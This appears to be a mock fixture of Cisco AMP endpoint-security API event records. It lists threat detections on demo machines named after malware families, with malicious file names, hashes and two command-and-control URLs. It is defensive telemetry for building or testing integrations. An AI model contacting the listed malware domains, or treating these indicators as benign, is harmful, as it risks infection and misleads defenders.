-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} 